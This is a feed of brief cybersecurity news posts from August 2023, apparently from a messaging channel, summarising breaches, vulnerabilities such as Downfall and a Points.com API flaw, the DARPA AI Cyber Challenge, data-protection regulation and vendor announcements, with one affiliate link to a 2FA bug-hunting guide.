Cyber Security News

23 Aug 2023 23:49

The Forrester Consulting TEI of Guardium Data Protection study: 5 Data Security Lessons

Forrester Consulting Total Economic Impact (TEI) study commissioned by IBM for its IBM Security Guardium Data Protection product.

The TEI study focuses specifically on Guardium Data Protection, but its interviews with security professionals reveal common concerns that data security analysts (DSAs) face.

- Visibility
- Compatibility
- Automated monitoring
- Easier audits
- Adapting to changing regulations

@Cyber_Security_Channel

Cyber Security News

23 Aug 2023 19:34

AI Hallucinations Could Be a Cybersecurity Risk

AI is trained from massive data sets, often containing flaws like thought gaps, content saliency variance, or harmful biases.

Any training from these incomplete or inadequate data sets could be the root of hallucinations, even if later iterations of the data set received curation from data scientists.

@Cyber_Security_Channel

Cyber Security News

23 Aug 2023 15:56

EY Breach Exposes Bank of America Customer Credit Card Numbers

Experts warn that even seemingly insignificant pieces of leaked personal information can be collated to have a devastating impact.

Victims whose data has been leaked often don’t realize they’ve been compromised and therefore take no action to mitigate the outcome.

EY said that Bank of America will provide exposed clients with a “complimentary two-year membership in an identity theft protection service.”

The letter urges potential victims to be vigilant and cautiously review account statements and credit reports for suspicious activity.

@Cyber_Security_Channel

Cyber Security News

23 Aug 2023 08:20

Your Data Protection Checklist

Under certain criteria, regulations such as the GDPR mandate a DPO’s appointment.

However, even if it is optional, you may consider appointing an independent and impartial advisor that will supervise data protection governance in the organization.

They should have expertise in data privacy and security practices and a solid grasp of business processes and industry specifics.

@Cyber_Security_Channel

Cyber Security News

22 Aug 2023 13:10

DARPA, White House launch $20M AI, Cybersecurity Challenge

Dubbed the “AI Cyber Challenge,” or AIxCC, the effort aims to “challenge competitors across the United States, to identify and fix software vulnerabilities using AI,” the White House announced today.

Google, Microsoft, OpenAI and Anthropic will lend expertise and technologies for the challenge.

DARPA will host an open competition for AIxCC where up to 20 teams will advance to the semifinals next August at the DEF CON 2024 conference, followed by up to five teams advancing to the finals, according to the agency’s website.

In August 2025, three winners will be chosen at DEF CON 2025. AIxCC will feature almost $20 million in prizes, according to the White House.

@Cyber_Security_Channel

Cyber Security News

22 Aug 2023 03:12

AmiViz and Darktrace Announce Cybersecurity Partnership

Darktrace’s Cyber AI Loop prevents, detects, responds, and heals from cyber-attacks, all at once, at all times, everywhere an organization touches data and people, whether that’s outside on the attack surface or inside the organization.

AmiViz is the first B2B enterprise marketplace focused on the cybersecurity industry in the Middle East, designed specially to serve the interests of enterprise resellers and vendors.

Driven by innovation and AI-powered technology, the platform provides a unique collaboration platform through a mobile application on iOS and Android, as well as a web-based platform to enterprise resellers, consultants, system integrators, channel partners, and vendors.

AmiViz and Darktrace will work closely to roll out several new channel initiatives to enhance collaboration and drive greater customer value.

AmiViz will help conduct technical and sales workshops, support proof of concept, and extend pre-sales, implementation, and first-line support to its partners across the region.

@Cyber_Security_Channel

Cyber Security News

21 Aug 2023 21:23

IBM Researchers Easily Trick ChatGPT Into Hacking

Researchers at IBM released a report Tuesday detailing easy workarounds they've uncovered to get large language models (LLMs) — including ChatGPT — to write malicious code and give poor security advice.

All it takes is knowledge of the English language and a bit of background knowledge on how these models were trained to get them to help with malicious acts.

@Cyber_Security_Channel

Cyber Security News

21 Aug 2023 14:23

Royal, Hive, Black Basta Ransomware Gangs ‘Collaborating on Cyber Attacks’

There were “distinct similarities” between techniques employed during four different incidents at the beginning of 2023, analysis showed, raising questions over whether the gangs have been collaborating.

“Despite Royal being a notoriously closed off group that doesn’t openly solicit affiliates from underground forums, granular similarities in the forensics of the attacks suggest all three groups are sharing either affiliates or highly specific technical details of their activities,” Sophos said.

@Cyber_Security_Channel

Cyber Security News

21 Aug 2023 10:29

Google Awards USD 15,000 to Apple Security Team for Finding Bug in Chrome Web Browser

The collaboration between tech companies in identifying and addressing security vulnerabilities is crucial for maintaining the safety and privacy of users’ data and ensuring the overall security of online platforms.

The ‘CVE-2023-4072’ vulnerability is a critical security flaw identified in Google Chrome’s WebGL implementation. It is classified as an “out of bounds read and write” bug, which means that an attacker could potentially access and modify memory areas beyond the allocated space, leading to potential security exploits.

@Cyber_Security_Channel

Cyber Security News

21 Aug 2023 05:25

GDPR Fines Just 6% of the Total Cost of Data Breaches

The most common causes of the breaches in the research weren’t cyber attacks.

Only a third (33%) of breaches reported were due to malware or phishing, with all breaches caused by threats from outside an organization accounting for 35% of reports. Insider threats, however, came to 40%.

Human error accounted for more – 23% were caused by data being shared with the wrong person, while 11% was due to lost or stolen data.

This includes, for example, stolen devices or paperwork being left in an unsecured location.

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 22:42

Downfall: New Intel CPU Attack Exposing Sensitive Information

Daniel Moghimi, the Google senior research scientist who discovered the flaw.

“I discovered that the Gather instruction, meant to speed up accessing scattered data in memory, leaks the content of the internal vector register file during speculative execution.

To exploit this vulnerability, I introduced Gather Data Sampling (GDS) and Gather Value Injection (GVI) techniques,” Moghimi added.

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 16:27

Protection is No Longer Straightforward – Why More Cybersecurity Solutions Must Incorporate Context

Think of it like making a trip to the Emergency Room.

The admitting ER physician is not likely to make a diagnosis and prescribe treatment based solely on the symptoms presented by the patient.

Doing so could lead to complications or further injury.

Instead, the physician must also consider additional context, such as past illnesses, medications, allergies, surgeries, and other relevant information. In many cases, it would be life-threatening if the physician had to take the time to make calls to previous doctors, pharmacies, etc., to gather this information.

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 11:44

How to Get Unlimited Airline Miles: Researchers Find the Cheat Codes

Vulnerabilities in the Points.com API could have been exploited to expose customer data, steal customers’ “loyalty currency” (like miles), or even compromise Points global administration accounts to gain control of entire loyalty programs.

An encrypted cookie assigned to each user had been encrypted with an easily guessable secret—the word “secret” … the researchers could decrypt their cookie, reassign themselves global administrator privileges for the site … and essentially assume god-mode-like capabilities

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 06:32

Understanding the Role of Runtime Application Self-Protection (RASP) in Cybersecurity

The primary function of RASP is to identify and block attacks in real-time.

It does this by continuously monitoring the behavior of an application, identifying malicious activities, and preventing them from causing harm.

This is particularly important in today’s digital landscape where attacks are becoming more sophisticated and harder to detect with traditional security tools.

RASP’s real-time response capability is another significant advantage. In the event of an attack, RASP can immediately take action to prevent the attack from progressing.

This could involve terminating a user’s session, stopping an application’s execution, or alerting the security team.

This immediate response can significantly reduce the potential damage caused by an attack.

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 01:45

Cybersecurity: What the Defense Industry Needs to Unlock to Stay Ahead

Cybersecurity is a key requirement for supporting software infrastructure across the entire military supply chain due to the recent increase in cyber warfare.

Organizations’ systems must be pen-tested and have enough built-in protection to avert and react to attempted data breaches or cyberattacks.

@Cyber_Security_Channel

Cyber Security News

23 Aug 2023 21:19

BlackBerry: AI Cybersecurity Pioneer, BlackBerry Introduced Major Update to Next-Generation AI Engine

BlackBerry pioneered the field of AI for predictive cyber defense, and today delivers the highest efficacy scores against the competition whether an endpoint is online or offline.

Cylance AI enables organizations to stay ahead of cyberattacks without sacrificing operational efficiency.

Rolled out automatically to all BlackBerry customers currently using CylanceENDPOINT™, CylanceEDGE™ and CylanceGUARD®, the new engine builds upon previous iterations that stop attacks 12 times faster and with 20 times less resources than other cybersecurity solutions.

@Cyber_Security_Channel

Cyber Security News

23 Aug 2023 17:30

Black Hat USA: Cybersecurity Community Can Help with National Security Policy

The CrowdSec Partner Program operates on three different tiers: silver, gold and platinum.

Each partner receives free training and certification through the CrowdSec Academy, and will have the opportunity to grow through the tiers, which offer different business benefits, such as revenue sharing, dedicated training and exclusive access to product features.

With a partner-first approach, CrowdSec’s primary goal is to elevate existing and future partners, and boost their revenue by providing them with comprehensive marketing resources, training and support.

@Cyber_Security_Channel

Cyber Security News

23 Aug 2023 13:43

'Sufficient Protections Not in Place' to Prevent Data Breach, Regulator Admits

The Electoral Commission expressed its “regret that sufficient protections were not in place to prevent this cyberattack” and indicated that, working with its security providers and experts from the National Cyber Security Centre, it has taken steps since the breach to improve its security systems and processes.

“We have strengthened our network login requirements, improved the monitoring and alert system for active threats and reviewed and updated our firewall policies,” it said.

@Cyber_Security_Channel

Cyber Security News

22 Aug 2023 21:42

Jericho Security Uses AI to Fight AI in New Frontier of Cybersecurity

Jericho Security’s approach marks a new frontier for cybersecurity, using machine-learning capabilities to essentially “fight AI with AI.”

Jericho pits an AI red team against an AI blue team in simulations to uncover vulnerabilities and develop more robust defenses.Jericho Security is the result of decades of collective observation of the evolution of cybersecurity threats by its founders.

@Cyber_Security_Channel

Cyber Security News

22 Aug 2023 06:42

🏹 Get Ready To Hunt 2FA Bugs like a Pro!

Looking for a way to approach Two Factor Authentication Bugs?

Our partners at Hacklido have a digital product that will help you find effective solutions.

↳ It shows you the process of finding 2FA flaws

Grab your copy and improve your skills:

→ https://gumroad.com/a/631226579/jdvwcd

Cyber Security News

22 Aug 2023 00:35

Third Parties Can Intervene in Belgian Data Protection Authority Proceedings and Appeal Its Decisions

The Constitutional Court agreed that the lack of remedies for interested third parties against decisions of the Litigation Chamber of the BDPA was not in line with the constitutional principle of equality.

The legislator has now gone one step further by giving appeal as well as intervention possibilities to interested third parties.

A first step to amend the legal framework and to develop a specific provision on appeal possibilities for interested third parties took place on 12 January 2023 as a result of a decision by the Belgian Constitutional Court.

@Cyber_Security_Channel

Cyber Security News

21 Aug 2023 17:33

White House Offers Prize Money for Hacker-Thwarting AI

To boost participation, the Defense Advanced Research Projects Agency (DARPA) running the competition will put $7 million into funding small businesses that want to compete, according to the White House.

DARPA is collaborating with AI tech titans Anthropic, Google, Microsoft, and ChatGPT-maker OpenAI, which will provide expertise and technology for the competition, Prabhakar said.

@Cyber_Security_Channel

Cyber Security News

21 Aug 2023 12:42

Case from a few days ago: Tesla's Software Cracked: Offers Free Upgrades That Even Musk Can't Fix

A recent revelationby a security researcher and a trio of PhD students from Germany has sent shockwaves across the automobile industry.

The team has reportedly found a backdoor to Tesla's sophisticated, AMD-based cars. They've managed to devise what could be the world's first unpatchable "Tesla Jailbreak", poised to unlock a trove of paid features – all for free.

@Cyber_Security_Channel

Cyber Security News

21 Aug 2023 07:56

Cornell introduces new AI-focused Board Governance program

The program offers presentations, panel discussions and networking events designed specifically for current board members of public and private companies.

Participants will explore matters in AI, data privacy, algorithmic bias and antitrust.

The small cohort size is intended to ensure high-quality peer-to-peer engagement on key issues and solutions that participants can directly apply to their organizations.

@Cyber_Security_Channel

Cyber Security News

21 Aug 2023 02:39

The Importance Of Safeguarding Businesses From Data Privacy And Cybersecurity Risk

Data privacy is handling and safeguarding personal or sensitive information, sometimes by multiple parties.

Businesses collect customer data for different reasons, but their primary purposes are to improve services, understand user behavior, and make efforts toward marketing.

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 19:56

Regtech and Cybersecurity: Strengthening Data Protection in Compliance

Regtech is the application of modern technology to streamline and automate regulatory compliance processes, such as artificial intelligence (AI), machine learning, and big data analytics.

The goal of regtech is to assist financial institutions in staying ahead of regulatory developments, ensuring compliance, and efficiently managing complicated reporting requirements.

Beyond just compliance, regtech offers the ability to improve cybersecurity and data protection policies.

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 13:08

Average Cost of a Data Breach Has Reached an All-Time High: IBM Report

Involving law enforcement in a ransomware attack also saved money and shortened the lifecycle of the breach.

Organizations that didn’t involve law enforcement in a ransomware attack incurred an additional $470,000 in expenses on average.

About 63% of respondents said they involved law enforcement.

The 37% that didn’t involve law enforcement paid 9.6% more and experienced a 33-day longer breach lifecycle.

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 08:55

When Your Teammate is a Machine: 8 Questions CISOs Should be Asking About AI

AI will effectively become an extension of automation processes and can uncover a vastly expanded breadth and span of information, helping to evaluate complexities at greater and greater speeds.

1. Did comprehensive testing to ensure the AI algorithm works as intended occur?

2. From where did the data used to train the AI come?

3. How was the AI algorithm designed to prevent, or mitigate as much as possible, bias in the results?

4. How was the algorithm designed to mitigate the new and challenging risks that emerge almost daily related to generative AI?

5. Has the vendor comprehensively addressed security concerns related to machine learning and if so, how?

6. Has the AI been engineered to account for the complexity of AI systems attack surfaces and if so, in what ways?

7. How have supply chain and third-party AI components been reviewed for security and privacy risk, and then mitigated?

8. Has the AI manufacturer or vendor developed their AI products to meet data protection compliance for the areas in which they will be sold?

@Cyber_Security_Channel

Cyber Security News

20 Aug 2023 03:59

KnowBe4 PhishER Plus Uses Triple-Validated Phishing Threat Feed

PhishER Plus users are trained to spot and report phishing attacks, KnowBe4 stated.

The information these users gather about phishing attacks is incorporated into the PhishER Plus Global Blocklist.

KnowBe4 provides a security awareness training and simulated phishing platform used by more than 60,000 organizations, the company said.

It also offers a partner program for MSSPs, MSPs and other technology providers.

@Cyber_Security_Channel

Cyber Security News

19 Aug 2023 22:40

Norway Imposes Heavy Fines on Meta Platforms for Privacy Violations

The specific breach in question involves Meta’s practice of collecting user data, such as their physical locations in Norway, and subsequently using this data for targeted behavioral advertising, a model commonly adopted across the tech industry.

@Cyber_Security_Channel